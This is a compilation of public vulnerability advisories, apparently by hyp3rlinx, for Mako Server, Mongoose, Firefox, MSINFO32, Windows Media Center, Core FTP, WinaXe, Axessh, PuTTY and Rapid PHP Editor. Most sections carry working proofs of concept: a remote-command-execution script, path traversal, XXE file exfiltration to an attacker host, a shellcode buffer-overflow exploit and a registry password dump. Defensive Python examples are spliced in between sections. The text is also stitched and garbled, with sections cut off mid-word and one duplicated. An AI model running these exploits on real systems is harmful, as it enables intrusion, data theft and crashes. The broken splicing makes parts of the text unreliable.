The Mako web-server tutorial does not sufficiently sanitize HTTP PUT requests. When an attacker sends an HTTP PUT request to
the save.lsp web page, the input is passed to a function responsible for accessing the filesystem. The attacker's input will
be saved on the victim's machine and can be executed by sending an HTTP GET request to manage.lsp.

HTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1'
HTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true=2.1=lua'

Proof of Concept

import urllib2,time

#MakoServer v2.5 Remote Command Execution 0day
#Credits: John Page AKA hyp3rlinx
#=================================

print 'MakoServer v2.5 Remote Command Execution'

CMD="os.execute('c:/Windows/system32/calc.exe')"

opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
request.add_header('Content-Type', 'text/plain;charset=UTF-8')
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
request.get_method = lambda: 'PUT'
opener.open(request)
time.sleep(1)
urllib2.urlopen('http://IP/examples/manage.lsp?execute=true=2.1=lua')

Unauthenticated File Disclosure

The Mako web-server tutorial does not sufficiently sanitize GET requests. When an attacker sends a GET request to the URI
IP/fs/../.., the input is passed on without modification and a response with the file content is returned.

Proof of Concept

The following GET request will respond with the C/Windows/system.ini content:

curl -v http://VICTIM-IP/fs/C/Windows/system.ini
* About to connect() to VICTIM-IP port 80
*   Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 80
> GET /fs/C/Windows/system.ini HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5
> OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 07 Aug 2017 22:21:27 GMT
< Server: MakoServer.net
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< Etag: 58b4be20
< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
< Content-Length: 219
< Keep-Alive: Keep-Alive
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

Server Side Request Forgery

The Mako web-server tutorial does not sufficiently sanitize incoming POST requests. When an attacker sends a POST request
to the rtl/appmgr/new-application.lsp URI, the input will be executed and the server will connect to the attacker's machine.

Proof of Concept

Start Wireshark to see successful connections made from the Mako Web Server victim machine.

Initiate requests from another machine using CURL:

curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP

Network Access:
===============
Re
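Added example, not the Mako Server's code nor part of the advisory: server-side checks for the two tutorial handlers described above. resolve_fs_path() confines a /fs/ request to a fixed document root instead of mapping its first segment onto a drive, and validate_new_application() refuses the io=net / path=http://... combination the SSRF PoC sends. DOC_ROOT, the io allowlist and the form dictionaries are constructed values.

```python
import posixpath
from urllib.parse import unquote, urlsplit

DOC_ROOT = "/srv/mako/www"   # constructed: the only tree /fs/ is allowed to expose
ALLOWED_IO = {"disk"}        # constructed allowlist; "net" would let path= reach out


def resolve_fs_path(url_path, doc_root=DOC_ROOT):
    """Map /fs/<relative> onto a file under doc_root, or return None.

    The check works on the decoded path string alone (no filesystem access):
    percent-encoded dots, '..' segments, NUL bytes, backslashes, drive
    letters and leading slashes are all refused rather than normalised away."""
    if not url_path.startswith("/fs/"):
        return None
    rel = unquote(url_path[len("/fs/"):])
    if "\x00" in rel or "\\" in rel or ":" in rel or rel.startswith("/"):
        return None
    segments = [s for s in rel.split("/") if s not in ("", ".")]
    if any(s == ".." for s in segments):
        return None
    return posixpath.join(doc_root, *segments) if segments else doc_root


def validate_new_application(form):
    """Accept only a local application source for new-application.lsp.

    form mimics the POST body; the PoC sent io=net and path=http://EXTERNAL-IP.
    Any io value outside the allowlist, any path carrying a URL scheme, and any
    path that does not resolve under DOC_ROOT is rejected."""
    io_kind = form.get("io", "")
    path = form.get("path", "")
    if io_kind not in ALLOWED_IO or urlsplit(path).scheme:
        return False
    return resolve_fs_path("/fs/" + path.lstrip("/")) is not None
```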
CVE-2017-11567 Mongoose Web Server v6.5 CSRF Command Execution ( apparitionsec @ gmail / hyp3rlinx )
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt
[+] ISR: apparitionSec

Vendor:
===============
www.cesanta.com

Product:
===============
Mongoose Web Server (Free Edition)
Mongoose-free-6.5.exe

Download: https://cesanta.com/binary.html

Mongoose - GitHub's most popular embedded web server and multi-protocol networking library

Mongoose Embedded Web Server Library - Mongoose is more than an embedded webserver. It is a multi-protocol embedded networking
library with functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more.

Vulnerability Type:
===================
CSRF - Command Execution

CVE Reference:
==============
CVE-2017-11567

Security Issue:
================
Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visiting an attacker-controlled
web page can execute system commands on the system hosting the Mongoose server.

However, IF Mongoose web server is installed as a service then executing programs e.g. "calc.exe" may at times crash or fail
to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests, commands may become unstable when Mongoose is
run as a service.

When Mongoose is run in standard mode attackers can potentially modify "Mongoose.conf" and create arbitrary files on the server
like .PHP etc. and point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new
attacker-generated file, after injecting commands into the Mongoose web server's log file that will get executed when the log
file is later requested.

This vulnerability requires the CGI interpreter to already be set, or some information about the target to be known, such as
the CGI path and the language used ("pl", "php", "cgi"), so that the correct programming language can be chosen when the file
is created during the initial CSRF attack.

Note: If running commands with arguments, we have to use "\t" tab chars, as using a space will break our TELNET based code
injection to the server log.

e.g. GET HTTP/1.1

OR just TELNET to the Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET.

After Command Injection "Mongoose.conf" will be:

# Mongoose web server configuration file.
# For detailed description of every option, visit
# https://github.com/cesanta/Mongoose
# Lines starting with '#' and empty lines are ignored.
# To make a change, remove leading '#', modify option's value,
# save this file and then restart Mongoose.

# access_control_list
access_log_file C:\Mongoose.access.php          <=== BOOM
# auth_domain mydomain.com
cgi_interpreter c:\xampp\php\php.exe            <== MUST BE SET
# cgi_pattern **.cgi$|**.pl$|**.php$
# dav_auth_file
# dav_root
# debug 0
document_root C:\
# enable_directory_listing yes
# error_log_file
# extra_headers
# extra_mime_types
# global_auth_file
# hide_files_patterns
# hexdump_file
index_files Mongoose.access.php                 < BOOM
# listening_port 8080
# run_as_user
# ssi_pattern **.shtml$|**.shtm$
# ssl_certificate
# ssl_ca_certificate
# start_browser yes
# url_rewrites

Mongoose log file Command Inject to create backdoor.
-------------------------------------------------------
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:30 - 127.0.0.1 - GET 400 0 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -

Tested Windows 7.

Exploit/POC:
=============

1) add backdoor account POC.

http://127.0.0.1:8080/__mg_admin?save; method="post">
document.forms[0].submit()

2) TELNET x.x.x.x 8080
GET HTTP/1.1
Enter Enter

TELNET x.x.x.x 8080
GET / HTTP/1.1
Enter Enter

Done, backdoor added!

1) run calc.exe POC.

http://127.0.0.1:8080/__mg_admin?save; method="post">
document.forms[0].submit()

2) TELNET x.x.x.x 8080
GET / HTTP/1.1
Enter Enter

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
====================
Vendor Notification: July 23, 2017
Vendor Notification: July 28, 2017
Vendor Acknowledgement: July 31, 2017
Vendor Fixed released version 6.9 : September 4, 2017
September 4, 2017 : Public Disclosure
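Added example, not Cesanta's code nor part of the advisory: a Mongoose.conf audit that reports the combination of settings the attack above depends on, an access log with a CGI extension, that same log served as an index file, and a document root covering a whole drive. The configuration texts are constructed; the first mirrors the post-injection file shown above.

```python
import fnmatch
import posixpath
import re

# Mongoose's default cgi_pattern, as shown commented out in the file above.
DEFAULT_CGI_PATTERN = "**.cgi$|**.pl$|**.php$"
# A bare drive ("C:", "C:\") or the filesystem root.
DRIVE_ROOT = re.compile(r"[A-Za-z]:[\\/]?|/")


def parse_mongoose_conf(text):
    """Return {option: value} for the uncommented 'option value' lines."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        option, _, value = line.partition(" ")
        conf[option] = value.strip()
    return conf


def _basename(path):
    return posixpath.basename(path.replace("\\", "/")).lower()


def matches_cgi_pattern(filename, pattern):
    """Mongoose patterns are '|'-separated globs: '**' matches any string and a
    trailing '$' anchors at the end, which fnmatch already does."""
    name = _basename(filename)
    for glob in pattern.split("|"):
        glob = glob.rstrip("$").replace("**", "*").lower()
        if fnmatch.fnmatchcase(name, glob):
            return True
    return False


def audit_mongoose_conf(text):
    """List the settings that together turn log injection into code execution."""
    conf = parse_mongoose_conf(text)
    findings = []
    log = conf.get("access_log_file", "")
    if log and matches_cgi_pattern(log, conf.get("cgi_pattern", DEFAULT_CGI_PATTERN)):
        findings.append("access_log_file %s has a CGI extension; request lines "
                        "written to it can be executed" % log)
    index_files = [f.strip().lower() for f in conf.get("index_files", "").split(",") if f.strip()]
    if log and _basename(log) in index_files:
        findings.append("index_files serves the access log %s as a directory index" % log)
    root = conf.get("document_root", "")
    if root and DRIVE_ROOT.fullmatch(root):
        findings.append("document_root %s exposes an entire drive" % root)
    return findings


# Constructed, mirroring the post-injection Mongoose.conf quoted in the advisory.
SAMPLE_INJECTED = r"""
# Mongoose web server configuration file.
# access_control_list
access_log_file C:\Mongoose.access.php
# auth_domain mydomain.com
cgi_interpreter c:\xampp\php\php.exe
# cgi_pattern **.cgi$|**.pl$|**.php$
document_root C:\
index_files Mongoose.access.php
# listening_port 8080
"""

# Constructed sane configuration: plain log file, normal index, scoped root.
SAMPLE_CLEAN = r"""
access_log_file C:\logs\mongoose.access.log
document_root C:\www
index_files index.html,index.htm
# cgi_interpreter
"""
```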
Firefox v54.0.1 Denial Of Service
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/FIREFOX-v54.0.1-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.mozilla.org

Product:
===============
Firefox v54.0.1

Vulnerability Type:
===================
Denial Of Service

Security Issue:
================
Dynamically creating the HTML elements IMG, FORM, DIV, P, A, H2, IFRAME, TABLE or TEXTAREA and assigning a very long string
of junk chars to the "style.color" property results in a Firefox Browser out of memory crash (not a tab crash).

Tested on Windows 7

References:
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288

Exploit/POC:
=============

var p1 = "\x41";
for (var c=0;c<0xC350;c++){
    p1+="\x41";
}

var p2="\x41";
for (c=0;c<0x1388;c++){
    p2 += p1;
}

var el = document.createElement('img')  //FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA  <=== OR any of these elements.
el.style.color=p2
document.body.appendChild(el)

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
====================
Vendor Notification: June 27, 2017
July 7, 2017 : Public Disclosure
Symantec VIP Access Desktop Arbitrary DLL Execution
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SYMANTEC-VIP-ACCESS-ARBITRARY-DLL-EXECUTION.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.symantec.com

Product:
===============
Symantec VIP Access Desktop versions prior to 2.2.2

Vulnerability Type:
===================
Arbitrary DLL Execution

CVE Reference:
==============
CVE-2016-6593

Vulnerability Details:
======================
VIP Access Desktop UI Manager invokes DLLs from the current working folder during startup. A malicious local user can create
specifically modified DLLs to replace the normal product DLLs required during startup. Then, by redirecting the startup path of
the VIP Access Desktop UI Manager, the user can cause the VIP Access Desktop UI Manager to invoke the substituted DLL instead of
the required product DLL. Any specifically modified code execution could be performed with logged-on user privileges, which is
normally user-level access in currently supported operating systems.

Ultimately, this problem is caused by a failure to properly validate required product DLLs during start-up. This could result
in a local user being able to manipulate VIP Access Desktop to load and execute an arbitrary DLL of the user's choice with
user-level privileges.

Reference:
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20161208_00

Disclosure Timeline:
====================
Vendor Notification: February 4, 2016
December 8, 2016 : Public Disclosure

Exploitation Technique:
=======================
Local
Microsoft MSINFO32.EXE ".NFO" Files XML External Entity
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.microsoft.com

Product:
===============
Windows System Information MSINFO32.exe v6.1.7601

Windows MSINFO32.EXE displays a comprehensive view of your hardware, system components, and software environment.

Parameters
FileName : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file.

Vulnerability Type:
===================
XML External Entity

CVE Reference:
==============
N/A

Vulnerability Details:
======================
Microsoft Windows MSINFO32.exe is vulnerable to an XML External Entity attack which can potentially allow remote attackers to
gain access to and exfiltrate files from the victim's computer if they open a malicious ".nfo" file via a remote share / USB etc.

Upon opening the file the user will see an error message like "System Information is unable to open this .nfo file. The file
might be corrupt" etc.

Tested Windows 7 SP1

Exploit code(s):
================
Access and exfiltrate the Windows "msdfmap.ini" file as a trivial POC. This file contains credentials for MS ADO Remote Data Services.

1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)

2) "payload.dtd"
http://attacker-ip:8080?%file;'>"> %all;

3) "FindMeThatBiatch.nfo" (corrupt .NFO file)
http://attacker-ip:8080/payload.dtd;> %dtd;]>

Double click to open FindMeThatBiatch.nfo, user gets error, MSINFO32 opens... attacker gets files.

OR open via Windows CL:

c:\>msinfo32 \\REMOTE-SHARE\FindMeThatBiatch.nfo

Disclosure Timeline:
====================
Vendor Notification: September 4, 2016
Vendor Reply "not meet the bar for security servicing": September 7, 2016
December 4, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High
Microsoft Windows Media Center "ehshell.exe" XML External Entity
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.microsoft.com

Product:
===============
Windows Media Center "ehshell.exe" version 6.1.7600

Vulnerability Type:
===================
XML External Entity

CVE Reference:
==============
N/A

Vulnerability Details:
======================
Windows Media Center "ehshell.exe" is vulnerable to an XML External Entity attack allowing remote access to ANY files on a
victim's computer, if they open an XXE laden ".mcl" file via a remote share / USB or from a malicious "windowsmediacenterweb"
web link.

Sometimes 'Windows Media Center' will crash, sometimes it opens normally and other times it will not open, but the files get
accessed and exfiltrated.

Tested Windows 7 SP1

Exploit code(s):
================
POC exfiltrate "msdfmap.ini" used by MS ADO Remote Data Services.

1) ATTACKER-IP listener
python -m SimpleHTTPServer 8080

2) Create the "FindMeThatBiotch.dtd" DTD file with below contents (host on ATTACKER-IP in the directory where the python
server is listening)

http://ATTACKER-IP:8080/%data666;'>">

3) Create the "EVIL.mcl" file.

http://ATTACKER-IP:8080/FindMeThatBiotch.dtd;> %junk; %param666; %FindMeThatBiotch; ]>

4) Get victim to open the EVIL.mcl ... enjoy your files!

OR create a link on a webpage to run the file, but "user has to consent first".

XXE POC

Disclosure Timeline:
====================
Vendor Notification: September 1, 2016
Vendor opens Case 34970: September 6, 2016
Vendor reply "Wont Fix" : October 19, 2016
December 4, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High
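Added example, not Microsoft's code nor part of either advisory; it serves both the MSINFO32 ".nfo" and the Media Center ".mcl" cases above. find_xxe_indicators() triages a file for the DOCTYPE constructs both PoCs rely on (external SYSTEM/PUBLIC entities and parameter entity references), and parse_without_external_entities() shows the parser setting that stops the file read: with external entity loading off, the SYSTEM entity expands to nothing. The three sample documents are constructed; "ATTACKER-IP" is the placeholder used in the advisories.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# DOCTYPE-level constructs that neither an .nfo nor an .mcl file needs.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_ENTITY_REF_RE = re.compile(r"%\w+;")


def find_xxe_indicators(text):
    """Return the reasons a file should be quarantined rather than opened."""
    reasons = []
    if DOCTYPE_RE.search(text):
        reasons.append("has a DOCTYPE")
    for m in EXTERNAL_ENTITY_RE.finditer(text):
        kind = "parameter" if m.group(1) else "general"
        reasons.append("declares an external %s entity (%s)" % (kind, m.group(2).upper()))
    if PARAM_ENTITY_REF_RE.search(text):
        reasons.append("references a parameter entity")
    return reasons


class _Collector(ContentHandler):
    """Record the root element name and all character data the parser delivers."""

    def __init__(self):
        super().__init__()
        self.root = None
        self.chunks = []

    def startElement(self, name, attrs):
        if self.root is None:
            self.root = name

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(text):
    """Parse with external entity loading switched off; returns (root, text).

    The SAX expat reader then answers every external entity reference with
    empty content instead of fetching the file or URL it names."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)   # no external general entities
    parser.setFeature(feature_external_pes, False)   # no external parameter entities
    handler = _Collector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(text.encode("utf-8")))
    return handler.root, "".join(handler.chunks).strip()


# Constructed .nfo-style document: a general entity pointing at a local file.
SAMPLE_NFO = """<?xml version="1.0"?>
<!DOCTYPE msinfo [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/msdfmap.ini">
]>
<msinfo>&xxe;</msinfo>
"""

# Constructed .mcl-style document: an external parameter entity pulling a DTD.
SAMPLE_MCL = """<?xml version="1.0"?>
<!DOCTYPE application [
  <!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/FindMeThatBiotch.dtd">
  %dtd;
]>
<application/>
"""

# Constructed benign document with no DOCTYPE at all.
SAMPLE_CLEAN = """<?xml version="1.0"?>
<application><name>demo</name></application>
"""
```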
Core FTP LE v2.2 Remote SSH/SFTP Buffer Overflow
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.coreftp.com

Product:
===============
Core FTP LE (client) v2.2 build 1883

Core FTP LE - free Windows software that includes the client FTP features you need. Features like SFTP (SSH), SSL, TLS, FTPS,
IDN, browser integration, site to site transfers, FTP transfer resume, drag and drop support, file viewing & editing, firewall
support, custom commands, FTP URL parsing, command line transfers, filters, and much, much more.

Vulnerability Type:
===================
Remote SSH/SFTP Buffer Overflow

CVE Reference:
==============
N/A

Vulnerability Details:
======================
The Core FTP client is vulnerable to a remote buffer overflow denial of service when connecting to a malicious server using the
SSH/SFTP protocol. Upon receiving an overly long string of junk from the malicious FTP server response, Core FTP crashes and the
stack is corrupted, with several registers EBX, EDX, EDI being overwritten as can be seen below.

WinDbg dump...

(d9c.16d8): Access violation - code c005 (first/second chance not available)
eax=035b ebx=4141 ecx=03ac7e40 edx=41414141 esi=03ac7e38 edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=

Exploit code(s):
================

import socket

print 'hyp3rlinx - Apparition Security'
print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'

host='127.0.0.1'
port = 22
s = socket.socket()
payload="A"*77500
s.bind((host, port))
s.listen(5)
print 'Listening on port... %i' %port
print 'Connect to me!'

while True:
    conn, addr = s.accept()
    conn.send(payload+'\r\n')
    conn.close()

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High
Putty Cleartext Password Storage
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PUTTY.EXE-INSECURE-PASSWORD-STORAGE.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.chiark.greenend.org.uk

Product:
===============
Putty.exe v0.67

PuTTY is a free and open-source terminal emulator, serial console and network file transfer application. It supports several
network protocols, including SCP, SSH, Telnet, rlogin, and raw socket connection.

Vulnerability Type:
===================
Cleartext Password Storage

Vulnerability Details:
======================
Putty.exe stores passwords unencrypted for sessions that use a Proxy connection and specify a password to save. Putty saves
sessions in the Windows registry and the passwords are stored in cleartext. By storing the passwords in the clear it can put
the Proxy server at risk if the system running Putty is compromised.

A casual Putty user may not be aware of how and where passwords are stored and may assume saving passwords is safe, as Putty
does NOT warn the user that saved Proxy passwords are stored in cleartext in the registry.

1) Create and save a Putty session specifying a Proxy for the connection, enter a password and save it.

2) Run the below 'Putty-Insecure-PWD.bat' script to search the registry for saved session passwords.

"Putty-Insecure-PWD.bat"
------------------------

@echo off
setlocal ENABLEEXTENSIONS

set /p v1=Enter Putty Saved Session: %1
echo Search registry for %v1% session Putty password?
pause

set KEY_NAME=HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\%v1%
set VALUE_NAME=ProxyPassword

FOR /F "tokens=1-3" %%A IN ('REG QUERY %KEY_NAME% /v %VALUE_NAME% 2^>nul') DO (
    set ValueName=%%A
    set ValueType=%%B
    set ValueValue=%%C
)

if defined ValueName (
    @echo Value Name = %ValueName%
    @echo Value Type = %ValueType%
    @echo Value Password = %ValueValue%
) else (
    @echo %KEY_NAME%\%VALUE_NAME% not found.
)

set "v1="

End BAT script/

e.g. output when run BAT file:

Value Name = ProxyPassword
Value Type = REG_SZ
Value Password = abc123

OR manually open regedit and ctrl+F to find 'SimonTatham', then find the session Key you saved.

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\

Next, find the String Name 'ProxyPassword' and double click to open

value name: ProxyPassword
Value data:
WinaXe v7.7 FTP 'Server Ready' CMD Remote Buffer Overflow
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security

Vendor:
===============
www.labf.com

Product:
===============
WinaXe v7.7 FTP

The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built and provided in the package. All that you need
to run remote UNIX and X Applications is included within WinaXe Plus. You operate simultaneously with X11, FTP and Telnet
sessions and with your familiar MS Windows applications.

Vulnerability Type:
===================
Remote Buffer Overflow

Vulnerability Details:
======================
The WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors when connecting to a malicious FTP Server
and receiving overly long payloads in the command response from the remote server.

220 SERVICE READY
331 USER / PASS
200 TYPE
257 PWD
etc...

Below is a POC for the "server ready" 220 command exploit when first connecting to an FTP server.

Exploit code(s):
================

import socket,struct

#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

eip=struct.pack('<L',0x68084A6F)      #POP ECX RET
jmpesp=struct.pack('<L',0x68017296)   #JMP ESP

#We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20

#Server Ready '220' Exploit
port = 21
s = socket.socket()
host = '127.0.0.1'
s.bind((host, port))
s.listen(5)
print 'Evil FTPServer listening...'

while True:
    conn, addr = s.accept()
    conn.send('220'+payload+'\r\n')
    conn.close()

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High
Axessh 4.2.2 Denial Of Service
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.labf.com

Product:
===============
Axessh 4.2.2

Axessh is a SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh
without sacrificing any of existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can
be sold anywhere in the world (apart from places where people aren't allowed to own cryptographic software).

2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers (for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers (for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding

Vulnerability Type:
===================
Denial Of Service

AxeSSH will crash after receiving an overly long payload of junk...

Exploit code(s):
================

1) Open the settings window for axessh and choose Run then click Run as EXE; this will launch "xwpsshd.exe", which crashes
with "bad protocol version".

import socket

print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"

ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium
Rapid PHP Editor CSRF Remote Command Execution
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt
[+] ISR: Apparition Security

Vendor:
===============
www.rapidphpeditor.com

Product:
===============
Rapid PHP Editor IDE
rapidphp2016.exe v14.1

Rapid PHP editor is a faster and more powerful PHP editor for Windows combining features of a fully-packed PHP IDE with the
speed of the Notepad. Rapid PHP is the most complete all-in-one software for coding PHP, HTML, CSS, JavaScript and other web
development languages with tools for debugging, validating, reusing, navigating and formatting your code.

Vulnerability Type:
===================
CSRF Remote Command Execution

CVE Reference:
==============
N/A

Vulnerability Details:
======================
There is a Remote Command Execution ailment in this IDE: if a user of this IDE is running the internal debug server listening
on localhost port 89 and they open a link or visit a malicious webpage, then remote attackers can execute arbitrary commands on
the victim's system.

Reference:
http://forums.blumentals.net/viewtopic.php?f=15=7062

Exploit code(s):
================
Call Windows "calc.exe" as POC

http://127.0.0.1:89/~C/Windows/system32/calc.exe;>Click it!

OR

http://127.0.0.1:89/~C/Windows/system32/calc.exe; method="post">
document.forms[0].submit()

Disclosure Timeline:
====================
Vendor notification: October 5, 2016
Vendor confirms vulnerability: October 7, 2016
Vendor releases fixed version: November 1, 2016
November 2, 2016 : Public Disclosure

Severity Level:
===============
High
Axessh 4.2.2 Denial Of Service
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.labf.com

Product:
========
Axessh 4.2.2

Axessh is an SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without sacrificing any existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold anywhere in the world (apart from places where people aren't allowed to own cryptographic software).

Axessh features include:
- Compatible with SSH protocol version 2.0 (an SSH2 client based on OpenSSH 3.4)
- Compatible with SSH protocol version 1.5
- Ciphers (for the SSH1 client): 3DES, Blowfish, DES, RC4
- Ciphers (for the SSH2 client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc
- Authentication using password
- Authentication using RSA
- Compression support
- Connection forwarding, including full support for X-protocol connection forwarding
- "Dynamic Forwarding", which provides other tasks on the same PC with requested port forwarding

Vulnerability Type:
===================
Denial Of Service

Axessh will crash after receiving an overly long payload of junk...

Exploit code(s):
================
